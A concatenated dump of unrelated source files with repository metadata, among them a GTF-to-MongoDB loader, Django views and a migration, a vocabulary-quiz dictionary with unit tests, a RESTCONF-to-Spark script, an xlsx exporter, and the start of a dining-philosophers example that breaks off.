{'transcript_id':transcript_id,'assembly':assembly},
{'$set':
{'{}_start'.format(entry):front_dic.get('start'),
'{}_end'.format(entry):front_dic.get('end')}
})
elif entry == 'exon':
transcript_id = latter_dic.get('transcript_id')
for key in latter_dic.keys():
if not key.startswith('exon'):
latter_dic.pop(key)
latter_dic['exon_start'] = front_dic.get('start')
latter_dic['exon_end'] = front_dic.get('end')
col.update(
{'transcript_id':transcript_id,'assembly':assembly},
{'$push':{'exon':latter_dic} },
False,
True
)
elif entry == 'CDS':
cds_aset = dict()
transcript_id = latter_dic.get('transcript_id')
cds_aset['cds_start'] = front_dic.get('start')
cds_aset['cds_end'] = front_dic.get('end')
cds_aset['protein_id'] = latter_dic['protein_id']
cds_aset['protein_version'] = latter_dic['protein_version']
col.update(
{'transcript_id':transcript_id,'assembly':assembly},
{'$push':{'cds':cds_aset}},
False,
True)
elif entry == 'start_codon' or entry == 'stop_codon':
transcript_id = latter_dic.get('transcript_id')
col.update(
{'transcript_id':transcript_id,'assembly':assembly},
{'$set':
{'{}_start'.format(entry):front_dic.get('start'),
'{}_end'.format(entry):front_dic.get('end')}
},
False,
True)
else:
print '================================',entry
latter_dic = dict()
n += 1
print grch,'gtf line',n,entry,gene_id
class dbMap(object):
"""docstring for dbMap"""
def __init__(self, arg):
super(dbMap, self).__init__()
self.arg = arg
class dbFilter(object):
"""docstring for dbFilter"""
def __init__(self, arg):
super(dbFilter, self).__init__()
self.arg = arg
def main():
modelhelp = model_help.replace('&'*6,'ENSEMBL_GENE').replace('#'*6,'ensembl_gene')
funcs = (downloadData,extractData,updateData,selectData,ensembl_gene_store)
getOpts(modelhelp,funcs=funcs)
if __name__ == '__main__':
main()
|
[
"ling.wu@myhealthgene.com"
] |
ling.wu@myhealthgene.com
|
adb12d09d6069e3548e300f017cbfcf43b1d6608
|
8658f9b6385eeccc02a92fbba8ad37f4d5356fef
|
/cs260/project6/AbstractCollection.py
|
7ef97fe2d35aa6934a14a1e57e33fa25d7a546e4
|
[] |
no_license
|
tlmurphy/freshman-projects
|
805effcca6ed1ceb9a56397239ae17ee5c5c840f
|
dbb966060c397b0ca5ac2e7601586ede511078f8
|
refs/heads/master
| 2021-06-02T01:53:58.243526
| 2016-07-19T20:03:03
| 2016-07-19T20:03:03
| 50,886,609
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,409
|
py
|
"""
Abstract Collection to be used
for all collections
This is the parent of all collections
Trevor Murphy
"""
class AbstractCollection(object):
"""An abstract collection implementation"""
# Constructor
def __init__(self, sourceCollection=None):
"""Sets the initial state of self, which includes the
contents of sourceCollection, if it's present."""
self._size = 0
if sourceCollection:
for item in sourceCollection:
self.add(item)
def __add__(self, other):
"""Returns a new bag containing the contents
of self and other."""
result = type(self)(self)
for item in other:
result.add(item)
return result
def __eq__(self, other):
"""Returns True if self equals other, or False otherwise."""
if self is other: return True
if type(self) != type(other) or len(self) != len(other):
return False
otherIter = iter(other)
for item in self:
if item != next(otherIter):
return False
return True
def __str__(self):
"""Returns the string representation of self."""
return "{" + ", ".join(map(str, self)) + "}"
def isEmpty(self):
if self._size == 0:
return True
else:
return False
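
# Editor's sketch of a minimal concrete subclass (hypothetical, not part of the course
# project); AbstractCollection only becomes usable once a subclass supplies add() and
# an iterator.
class ExampleBag(AbstractCollection):
    def __init__(self, sourceCollection=None):
        self._items = []
        AbstractCollection.__init__(self, sourceCollection)

    def add(self, item):
        self._items.append(item)
        self._size += 1

    def __iter__(self):
        return iter(self._items)

# str(ExampleBag([1, 2]) + ExampleBag([3])) then evaluates to "{1, 2, 3}".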
|
[
"murphtrevor@gmail.com"
] |
murphtrevor@gmail.com
|
05d8817e7de13d880fc4971f0a4391b0f59f954d
|
ac9776814df50efe2e12e216078c7b835c27e184
|
/hrparser/data_parser/person_parser.py
|
0c09a5e6092b92edfb2205989eccb62d9ec32f2b
|
[] |
no_license
|
danesjenovdan/hr-parser
|
0b2d4b06f7172cf6ffac224bae23f998d52d675e
|
ed51b19fa82cc4f4e02765ed4f4b0673fd691639
|
refs/heads/master
| 2022-12-11T18:18:21.887449
| 2019-11-28T13:56:34
| 2019-11-28T13:56:34
| 135,311,488
| 0
| 0
| null | 2022-11-22T02:30:13
| 2018-05-29T14:51:04
|
Python
|
UTF-8
|
Python
| false
| false
| 2,308
|
py
|
from .base_parser import BaseParser
from ..settings import API_URL, API_AUTH, API_DATE_FORMAT
from .utils import parse_date
from datetime import datetime
class PersonParser(BaseParser):
def __init__(self, data, reference):
# call init of parent object
super(PersonParser, self).__init__(reference)
        self.name = data['name']
        self.area = data['area']
        self.education = data['education']
        self.party = data['party']
        self.wbs = data['wbs']
        if 'num_of_prev_mandates' in data.keys():
            self.num_of_prev_mandates = int(data['num_of_prev_mandates']) + 1
else:
self.num_of_prev_mandates = 1
try:
            self.birth_date = parse_date(data['birth_date']).isoformat()
except:
self.birth_date = None
try:
            self.start_time = parse_date(data['start_time']).isoformat()
except:
self.start_time = self.reference.mandate_start_time.isoformat()
        # prepare dictionaries for setters
self.person = {}
self.area_data = {
"name": item['area'],
"calssification": "district"
}
if self.get_person_id(self.name):
print('pass')
pass
else:
self.get_person_data()
def get_person_data(self):
edu = parse_edu(self.education)
        area_id, method = add_or_get_area(self.area, self.area_data)
if area_id:
area = [area_id]
else:
area = []
person_id = self.get_or_add_person(
fix_name(self.name),
districts=area,
mandates=self.num_of_prev_mandates,
education=edu,
birth_date=self.birth_date
)
party_id = self.add_organization(self.party, "party")
        membership_id = self.add_membership(person_id, party_id, 'member', 'cl', self.start_time)
        if self.wbs:
for wb in self.wbs:
wb_id = self.add_organization(wb['org'], 'committee')
self.add_membership(
person_id,
wb_id,
wb['role'],
wb['role'],
self.reference.mandate_start_time.isoformat()
)
|
[
"cofek0@gmail.com"
] |
cofek0@gmail.com
|
55412c5f714fe716cc21d55bc47bbafcb16b931b
|
80dcf54754f9d58fed1d0e034c93c50ba27443dc
|
/dictionary.py
|
abc72fd4d2f20c997e317a1aef71f451ee3754ec
|
[] |
no_license
|
ilich8884/LearningEnglish
|
4465e55ce8ade9febebc26d12178c26664bd142b
|
abf862f4969de6b7c3743d4f6407f876bc00d25c
|
refs/heads/master
| 2020-12-24T22:05:10.021784
| 2012-11-02T01:09:14
| 2012-11-03T15:55:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,479
|
py
|
# -*- coding: utf-8 -*-
import json
import os.path
import word
import global_stat
import unittest
class Dict:
def __init__(self):
self.words = {}
def get_word_by_key(self, en):
w = self.words.get(en)
if not w:
w = self.words[en] = word.Word()
return w
def reload_dict_s(self, text):
self.words = {}
for it in json.loads(text):
en = it[0]
tr = it[1]
ru = it[2]
self.get_word_by_key(en).add_value(en, tr, ru)
def reload_dict(self, path):
self.reload_dict_s(open(path).read())
def reload_stat_s(self, text):
stat_json = json.loads(text)
data = stat_json["data"]
for it in data:
self.get_word_by_key(it).unpack(data[it])
def reload_stat(self, path):
if os.path.exists(path):
self.reload_stat_s(open(path).read())
def loaded_words(self, type_pr):
return [(it, it.get_stat(type_pr)) for it in self.words.values() if it.is_load()]
def global_statistic(self, min_percent, min_success_cnt):
stat = global_stat.GlobalStatistic(min_percent, min_success_cnt)
for it in self.words.values():
if it.is_load():
stat.add_word(it, it.get_stat(word.en_to_ru_write), it.get_stat(word.ru_to_en_write))
return stat
def words_for_lesson(self, cnt_study_words, min_percent, min_success_cnt, type_pr):
learned_words = []
studied_words = []
for wrd, stat in self.loaded_words(type_pr):
if stat.get_total_answer() > 0:
if stat.get_success_persent() >= min_percent and stat.get_total_answer() >= min_success_cnt:
learned_words.append(wrd)
else:
studied_words.append(wrd)
        # top up with studied/learned words from the other translation direction
if len(studied_words) < cnt_study_words:
inv_type_pr = word.ru_to_en_write if type_pr == word.en_to_ru_write else word.en_to_ru_write
for wrd, stat in self.loaded_words(inv_type_pr):
if stat.get_total_answer() > 0 and wrd not in (learned_words+studied_words):
studied_words.append(wrd)
if len(studied_words) == cnt_study_words:
break
        # top up with words that have never been studied yet
if len(studied_words) < cnt_study_words:
for wrd, stat in self.loaded_words(type_pr):
if stat.get_total_answer() == 0 and wrd not in (learned_words+studied_words):
wrd.set_first()
studied_words.append(wrd)
if len(studied_words) == cnt_study_words:
break
studied_words.sort(key = lambda it : it.get_stat(type_pr).get_success_persent())
studied_words = studied_words[:cnt_study_words]
lesson_words = learned_words + studied_words
for it in lesson_words:
rating = it.get_stat(type_pr).calc_rating(min_percent, min_success_cnt)
it.set_rating(rating)
return lesson_words
def save_stat(self, path_to_stat):
data = {}
for it in self.words:
data[it] = self.words[it].pack()
stat_json = {"version" : 1, "data" : data}
json.dump(stat_json, open(path_to_stat, "wb"), indent=2)
class DictTestCase(unittest.TestCase):
def setUp(self):
self.dict_obj = Dict()
def create_word_data(self, num):
return ["en"+str(num), "tr"+str(num), "ru"+str(num)]
def create_word_stat(self, num):
key = "en"+str(num)
date = "2012.01"
stat1 = [num*1, num*10, date+str(num), num%2 == 0]
stat2 = [num*20, num*30, date+str(num+1), num%2 == 1]
return [key, {"0": stat1, "1": stat2}]
def load_dict(self, interval_from, interval_to):
json_dict = [self.create_word_data(i) for i in range(interval_from,interval_to)]
self.dict_obj.reload_dict_s(json.dumps(json_dict))
def load_stat(self, interval_from, interval_to):
json_data = dict([self.create_word_stat(i) for i in range(interval_from,interval_to)])
json_stat = {"version" : 1, "data" : json_data}
self.dict_obj.reload_stat_s(json.dumps(json_stat))
def assertLoad(self, num):
dt = self.create_word_data(num)
wrd_info = self.dict_obj.get_word_by_key("en"+str(num)).get_show_info()
self.assertEqual((dt[0], "[%s]" % dt[1], dt[2]), wrd_info)
def assertNotLoad(self, num):
wrd_info = self.dict_obj.get_word_by_key("en"+str(num)).get_show_info()
self.assertEqual(("", "", ""), wrd_info)
def assertLoadStat(self, num):
wrd1 = word.Word()
wrd1.unpack(self.create_word_stat(num)[1])
wrd2 = self.dict_obj.get_word_by_key("en"+str(num))
self.assertEqual(wrd1.get_stat(0), wrd2.get_stat(0))
self.assertEqual(wrd1.get_stat(1), wrd2.get_stat(1))
def test_reload_dict(self):
interval_from = 0
interval_to = 5
self.load_dict(interval_from, interval_to)
for i in range(interval_from, interval_to):
self.assertLoad(i)
def test_reload_dict_err_key(self):
interval_from = 0
interval_to = 5
self.load_dict(interval_from, interval_to)
for i in range(interval_to, interval_to*2):
self.assertNotLoad(i)
def test_reload_dict_double_reload(self):
interval_from1 = 0
interval_to1 = 5
self.load_dict(interval_from1, interval_to1)
interval_from2 = 3
interval_to2 = 8
self.load_dict(interval_from2, interval_to2)
for i in range(interval_from1, interval_from2):
self.assertNotLoad(i)
for i in range(interval_from2, interval_to2):
self.assertLoad(i)
def test_reload_stat(self):
interval_from = 0
interval_to = 5
self.load_dict(interval_from, interval_to)
self.load_stat(interval_from, interval_to)
for i in range(interval_from, interval_to):
self.assertLoad(i)
self.assertLoadStat(i)
def test_reload_stat_without_word(self):
interval_from = 0
interval_to = 5
self.load_stat(interval_from, interval_to)
for i in range(interval_from, interval_to):
self.assertLoadStat(i)
def test_reload_stat_double(self):
interval_from1 = 0
interval_to1 = 5
self.load_stat(interval_from1, interval_to1)
interval_from2 = 3
interval_to2 = 8
self.load_stat(interval_from2, interval_to2)
for i in range(interval_from1, interval_to2):
self.assertLoadStat(i)
def test_loaded_words(self):
interval_from1 = 0
interval_to1 = 5
self.load_dict(interval_from1, interval_to1)
interval_from2 = 3
interval_to2 = 9
self.load_stat(interval_from2, interval_to2)
loaded_words = self.dict_obj.loaded_words(0)
self.assertEqual(len(loaded_words), len(range(interval_from1, interval_to1)))
for i,it in enumerate(loaded_words):
self.assertEqual(it[0].get_show_info()[0], "en"+str(i))
if __name__=="__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(DictTestCase)
unittest.TextTestRunner(verbosity=2).run(suite)
|
[
"ReanGD@yandex.ru"
] |
ReanGD@yandex.ru
|
545d6dfe6abc36a6a5e48876c2ed2067604cf3a9
|
5e7dd2da8eec0cff4b9e67a4a6f0633ce4b76524
|
/apps/news/views.py
|
6387006f673ba11a61a500002d2767dbddfc32dc
|
[] |
no_license
|
Hyuancheng/xfz_vue_server
|
90f1a42dc8be22f9385f1e936a0d9bb4b0001137
|
3512fb0b9f3e9b0f0214ef71306fb4d524616b21
|
refs/heads/master
| 2022-09-22T11:52:50.605832
| 2020-06-01T11:32:48
| 2020-06-01T11:32:48
| 268,471,971
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,079
|
py
|
from django.shortcuts import render
from django.views import View
from .models import News
class NewsView(View):
"""首页"""
def get(self, request):
        # fetch all news together with their category and author info to reduce follow-up database queries
news = News.objects.all().defer('content').select_related('category', 'author')
content = {
'news': news
}
return render(request, 'news/index.html', content)
class NewsDetailView(View):
"""新闻详情"""
def get(self, request):
new_id = request.GET.get('new_id')
new = News.objects.select_related('category', 'author').get(id=new_id)
content = {
'new': new
}
return render(request, 'news/news_detail.html', content)
# class NewsSearchView(View):
#     """Search"""
#
# def get(self, request):
# news = News.objects.all().defer('content').select_related('category', 'author')
# content = {
# 'news': news
# }
# return render(request, 'search/search.html', content)
|
[
"1520966793@qq.com"
] |
1520966793@qq.com
|
f2073f2537f4bef9e0aa717f74eec294e4e5a9cd
|
cb8c63aea91220a9272498d5ea6cca0a0738b16a
|
/sodasurpler.py
|
87cbd97f69aa81b669f4592f8d2fae5f03d8a6e7
|
[] |
no_license
|
akantuni/Kattis
|
1265de95bfe507ce7b50451a16f19720b86bef44
|
12f31bb31747096bf157fcf6b1f9242d91654533
|
refs/heads/master
| 2021-12-14T11:18:27.723045
| 2021-12-11T05:43:37
| 2021-12-11T05:43:37
| 111,472,667
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 180
|
py
|
s = input()
e = int(s.split(" ")[0])
f = int(s.split(" ")[1])
c = int(s.split(" ")[2])
t = e + f
ans = 0
while t // c != 0:
ans += t // c
t = t // c + t % c
print(ans)
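# Worked trace (editor's example values, not from the problem statement): with
# e=9 empty bottles, f=0 found bottles and c=3 empties per new soda, t starts at 9:
# drink 9//3=3 (ans=3), 3 empties remain; drink 3//3=1 (ans=4), 1 empty remains,
# and 1 < 3 so the loop stops and 4 is printed.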
|
[
"akantuni@gmail.com"
] |
akantuni@gmail.com
|
672c8451e5896176ef5174de4b6496c4b1e3a6b2
|
cd3fab4d8e30aebe5c996fb2389d4a15a21feb10
|
/python/find_the_smallest_integer_in_the_array.py
|
6ee56679d6e3bab16389ffa9e6b4988ed44426f7
|
[] |
no_license
|
luisflores189544/codewars-solutions
|
93c1c3113c52779ce9537ee5d5397442d626ea56
|
1ad4dae2519cbf3f5b45201fe01a5be0762a0e6f
|
refs/heads/master
| 2020-03-17T20:03:57.883229
| 2018-06-20T17:41:54
| 2018-06-20T17:41:54
| 133,891,731
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
# Given an array of integers, your solution should find the smallest integer.
def find_smallest_int(arr):
return sorted(arr)[0]
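
# Editor's note (sketch, not part of the submitted solution): the built-in min()
# returns the same result without the O(n log n) sort:
#     def find_smallest_int(arr):
#         return min(arr)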
|
[
"noreply@github.com"
] |
luisflores189544.noreply@github.com
|
79e79a6dba06cb195c15c6de2977218994c616bb
|
6af3cf565ebab9b54af285268db6fc5e8cf9c465
|
/api/migrations/0001_initial.py
|
a08891e9e278ae1ea61ea8891b24fd389375cd51
|
[] |
no_license
|
tabishimam2/Nurturelabs_Assignment
|
5508c57f98a4bf30fcc4189e61caba1873e45ce4
|
cfb32de9281ef4e9cfadcef74459f0b6000fbd47
|
refs/heads/master
| 2023-04-14T04:40:41.283457
| 2021-05-09T17:02:52
| 2021-05-09T17:02:52
| 365,726,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,524
|
py
|
# Generated by Django 3.2 on 2021-05-09 12:01
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Advisor',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('advisorname', models.CharField(max_length=100)),
('picture', models.ImageField(upload_to='media/')),
],
),
migrations.CreateModel(
name='Booking',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=100)),
('userid', models.IntegerField(max_length=100)),
('advisorname', models.CharField(max_length=100)),
('advisorid', models.IntegerField(max_length=100)),
('time', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=100)),
('password', models.CharField(max_length=100)),
('email', models.EmailField(max_length=254)),
],
),
]
|
[
"timam799@gmail.com"
] |
timam799@gmail.com
|
4954477aa6e16c22ed490e8df4230d5604f3a58b
|
33f1bfde0ae84747ed66946917bd94edf8e9b512
|
/07 - Listen in Python/Notebooks in anderen Formaten/py/Arbeiten mit Tupeln.ipynb.py
|
17ef40d38c37cdfe529db4cda60bb0abcefcf885
|
[] |
no_license
|
LCK1635/Python_Kurs
|
66bb8ce356a9c3fe41a90c2995bb63e7a81f2fe4
|
8742604e677baa3774cde9b2434c1b40470a224f
|
refs/heads/master
| 2021-09-07T04:23:36.732602
| 2018-02-17T12:56:32
| 2018-02-17T12:56:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,305
|
py
|
# This .py file was generated automatically from the IPython notebook (.ipynb).
#
# Participants occasionally asked me whether I could also provide the course
# materials as plain .py files. That makes it possible to open the code without
# Jupyter, for example when Python programs are developed in a terminal or in
# Eclipse.
#
# This export is meant to cover that. I still recommend looking at the IPython
# notebooks directly, or at their HTML export; in my opinion this plain .py
# export is somewhat hard to read.
# coding: utf-8
# ## Working with Tuples
#
# In this lesson you will learn:
#
# - How to use tuples to model multiple return values of a function
# - How to unpack tuples
# In[4]:
student = ("Max Müller", 22, "Informatik")
name, age, subject = student
# name = student[0]
# age = student[1]
# subject = student[2]
print(name)
print(age)
print(subject)
# In[5]:
def get_student():
return ("Max Müller", 22, "Informatik")
name, age, subject = get_student()
print(name)
print(age)
print(subject)
# In[9]:
students = [
("Max Müller", 22),
("Monika Mustermann", 23)
]
for name, age in students:
print(name)
print(age)
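# Editor's addition (not in the original notebook): Python 3 also supports extended
# unpacking with a starred target, which is useful when a tuple has a fixed head and
# a variable-length rest.

# In[10]:

first, *rest = ("Max Müller", 22, "Informatik")
print(first)  # Max Müller
print(rest)   # [22, 'Informatik']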
|
[
"tillin@besonet.ch"
] |
tillin@besonet.ch
|
24af84abc07f34ca0d70f0e9fca0d9761cde7931
|
c30b95effe38f0e5afb058a10ed2b091df492e86
|
/algorithms/strings/reduced_strings.py
|
de5f7185518f1efa3da12366b05e122440e650b1
|
[] |
no_license
|
anikasetia/hackerrank
|
f7fbacf1ac5ef439842dffbe1592ebcd18271547
|
7f2605eb6a373516a8c11e01ffa08d9353395aa4
|
refs/heads/master
| 2021-01-25T09:53:39.934309
| 2018-08-09T15:30:27
| 2018-08-09T15:30:27
| 123,328,471
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
s = list(input())
i = 0
while(i < len(s) - 1):
if(s[i] == s[i+1]):
s.pop(i)
s.pop(i)
i = 0
else:
i += 1
newString = (''.join(s))
if(newString == ''):
print("Empty String")
else:
print(newString)
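# Worked trace (editor's example, the classic sample for this problem):
#   "aaabccddd" -> "abccddd" -> "abddd" -> "abd"  => prints "abd"
#   "baab"      -> "bb"      -> ""                => prints "Empty String"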
|
[
"anika.setia18@gmail.com"
] |
anika.setia18@gmail.com
|
c29e606bdbcccef5278639c8e865ee2a5ea6d5dc
|
cdc44b20348b1aad4b00b09d6213deb9682a779f
|
/venv/bin/pyreverse
|
cef1c06ab98a059d611a6bc2bf6b2fafde73c4a5
|
[] |
no_license
|
matias6942/MIR-Tarea1
|
576fef19bd3213870feeba31e081175ff4b8c198
|
84db2480740225919c0c496acaf868caff346400
|
refs/heads/master
| 2021-09-25T02:19:32.081577
| 2018-10-16T23:31:18
| 2018-10-16T23:31:18
| 150,164,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 260
|
#!/home/matias/Documents/MIR-Tarea1/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_pyreverse
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run_pyreverse())
|
[
"matias.zamora@ing.uchile.cl"
] |
matias.zamora@ing.uchile.cl
|
|
a2486b55709abc8b65ab3d41b9a15ff29a0671c7
|
fa0c32e18262897f5ba558950c2a7d33665ae97c
|
/charts/sheets.py
|
ed04c084f9fca8d7e06033688733c74533308471
|
[
"Apache-2.0"
] |
permissive
|
sanjaynv/SBK
|
8634d35fe6268030af8f6b062152468133801041
|
64655cd18e999f6274d738f8e421a66473d490f2
|
refs/heads/master
| 2023-07-06T00:09:27.984821
| 2023-06-19T13:52:02
| 2023-06-19T13:52:02
| 247,745,359
| 2
| 0
|
Apache-2.0
| 2020-03-16T15:25:08
| 2020-03-16T15:25:08
| null |
UTF-8
|
Python
| false
| false
| 2,338
|
py
|
#!/usr/local/bin/python3
# Copyright (c) KMG. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
##
# SBK-sheets : Storage Benchmark Kit - Sheets
from pandas import read_csv
from xlsxwriter import Workbook
import charts.constants as constants
def wb_add_two_sheets(wb, r_name, t_name, df):
header = df.columns.values
r_ws = wb.add_worksheet(r_name)
t_ws = wb.add_worksheet(t_name)
for c, h in enumerate(header):
r_ws.set_column(c, c, len(h))
t_ws.set_column(c, c, len(h))
r_ws.write(0, c, h)
t_ws.write(0, c, h)
r_row = 1
t_row = 1
for row in df.iterrows():
if row[1][constants.TYPE] == constants.TYPE_TOTAL:
ws, row_num = t_ws, t_row
t_row += 1
else:
ws, row_num = r_ws, r_row
r_row += 1
for c, h in enumerate(header):
col_size = len(str(row[1][h])) + 1
if col_size > len(h):
ws.set_column(c, c, col_size)
try:
ws.write(row_num, c, row[1][h])
except Exception as ex:
pass
def add_sbk_logo(wb):
ws = wb.add_worksheet("SBK")
ws.insert_image('K7', "./images/sbk-logo.png", {'x_scale': 0.5, 'y_scale': 0.5})
class SbkSheets:
def __init__(self, i_file, o_file):
self.iFile = i_file
self.oFile = o_file
def create_sheets(self):
wb = Workbook(self.oFile)
add_sbk_logo(wb)
df = read_csv(self.iFile)
wb_add_two_sheets(wb, constants.R_PREFIX + "1", constants.T_PREFIX + "1", df)
wb.close()
print("xlsx file %s created" % self.oFile)
class SbkMultiSheets(SbkSheets):
def __init__(self, i_files_list, o_file):
super().__init__(i_files_list[0], o_file)
self.iFilesList = i_files_list
def create_sheets(self):
wb = Workbook(self.oFile)
add_sbk_logo(wb)
for i, file in enumerate(self.iFilesList):
wb_add_two_sheets(wb, constants.R_PREFIX + str(i + 1), constants.T_PREFIX + str(i + 1), read_csv(file))
wb.close()
print("xlsx file : %s created" % self.oFile)
|
[
"keshava.gowda@gmail.com"
] |
keshava.gowda@gmail.com
|
e6498a09c3b06d7c6725afa0311b15c560317083
|
191a24cd8ca4fd54789fc861a282cf82ea079434
|
/secretary2/urls.py
|
4ebee877f669a4c67d478e02b76746c96e3b6edf
|
[] |
no_license
|
Uccueo4/secretary2
|
5abbd6801fdf802c3f177761c741f771ced55f89
|
901519b9d953964bf8ed95dfa5b68706094321b4
|
refs/heads/master
| 2021-01-11T14:25:31.394356
| 2017-02-09T05:49:13
| 2017-02-09T05:49:13
| 81,407,599
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,296
|
py
|
"""secretary2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from web import views
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^diary/(?P<month>\d+)/$', views.diary),
url(r'^diary/add/$', views.diary_add),
url(r'^diary/word/(?P<month>\d+)/$', views.diary_word),
url(r'^home/$', views.home),
url(r'^money/(?P<month>\d+)$', views.money),
url(r'^money/add/$', views.money_add),
url(r'^money/excel/(?P<month>\d+)/$', views.money_excel),
url(r'^$', views.user_login),
url(r'^logout/$',auth_views.logout),
]
|
[
"silentwindma@gmail.com"
] |
silentwindma@gmail.com
|
0582ca31bc079ef0d0101aef1f0272cffce156bb
|
35d5682a7cc9d93c11e0486bb132cffc16f37859
|
/NWPLab/restconf-to-spark.py
|
d8998870b9bf8190c7029e061c5cab2f3fc0ccbe
|
[] |
no_license
|
martynrees/devnet-express-code-samples
|
6032e6caed8fef03671d64eafce5119f0f09a9e6
|
c7592275461cd9d3c207befb0142aadba54c41c9
|
refs/heads/master
| 2021-01-19T21:00:35.798441
| 2017-04-17T21:24:19
| 2017-04-17T21:24:19
| 88,588,636
| 1
| 0
| null | 2017-04-18T06:13:04
| 2017-04-18T06:13:04
| null |
UTF-8
|
Python
| false
| false
| 3,578
|
py
|
#!/usr/bin/env python
# ############################################################################
# Copyright (c) 2016 Bruno Klauser <bklauser@cisco.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ''AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
#
# TECHNICAL ASSISTANCE CENTER (TAC) SUPPORT IS NOT AVAILABLE FOR THIS SCRIPT.
#
# Always check for the latest Version of this script via http://cs.co/NWPLab
# ############################################################################
#
# This sample script illustrates how to query operational data from a router
# via the RESTCONF API and then post the results into an existing Spark room
# via the Spark REST APIs.
#
# Initial Version by Joe Clarke - thanks Joe!
# ############################################################################
import _LabEnv
import requests
import json
import sys
# ############################################################################
# Variables below
# ############################################################################
RESTCONF_API = "http://198.18.133.218:8008/api/operational/interfaces-state?deep"
INTF = 'GigabitEthernet1'
TEXT = 'Hello, %s, this is %s. Interface %s has received %d bytes and transmitted %d bytes.'
SPARK_ROOM_ID = None
# ############################################################################
# Get Router Interface Data via RESTCONF
# ############################################################################
response = requests.request("GET", RESTCONF_API, headers=_LabEnv.RESTCONF_HEADERS, verify=False)
j = json.loads(response.text)
in_octets = -1
out_octets = -1
for intf in j['ietf-interfaces:interfaces-state']['interface']:
if intf['name'] == INTF:
in_octets = intf['statistics']['in-octets']
out_octets = intf['statistics']['out-octets']
break
if in_octets == -1 or out_octets == -1:
print("Failed to find statistics for interface " + INTF)
sys.exit(1)
# ############################################################################
# Post to Spark Room
# ############################################################################
messagetext = TEXT % (_LabEnv.LAB_SESSION, _LabEnv.LAB_USER, INTF, in_octets, out_octets)
r = _LabEnv.postSparkMessage(messagetext)
print('Spark Response: ' + r.text)
# ############################################################################
# EOF
# ############################################################################
|
[
"darien@sdnessentials.com"
] |
darien@sdnessentials.com
|
9c683f0f896498477456d213422ba9310195fb08
|
6ecfc4ad9e2b61eb647c09b43fd955862e644eb4
|
/Week03/哲学家.py
|
410a9df2d5af21962da46ad57525e27f97f6d716
|
[] |
no_license
|
brownfoxsir/Python004
|
4ebfebf969430a657d1bc5e65cb697c8ffc05291
|
7fb9b9d169dbacf6aa93c878973fa938325c9fed
|
refs/heads/master
| 2023-02-07T12:10:32.965733
| 2020-12-20T15:57:38
| 2020-12-20T15:57:38
| 295,945,252
| 0
| 1
| null | 2020-09-16T06:37:52
| 2020-09-16T06:37:52
| null |
UTF-8
|
Python
| false
| false
| 2,712
|
py
|
#!/usr/bin/python
import sys
import threading
import time
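# Dining-philosophers demo: each fork is a condition-variable-guarded resource and
# a "butler" semaphore admits at most n-1 philosophers at a time, which breaks the
# circular wait that would otherwise cause deadlock.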
class Semaphore(object):
def __init__(self, initial):
self.lock = threading.Condition(threading.Lock())
self.value = initial
def up(self):
with self.lock:
self.value += 1
self.lock.notify()
def down(self):
with self.lock:
while self.value == 0:
self.lock.wait()
self.value -= 1
class Fork(object):
def __init__(self, number):
self.number = number # fork id
self.user = -1 # which philosopher is currently holding this fork (-1 = none)
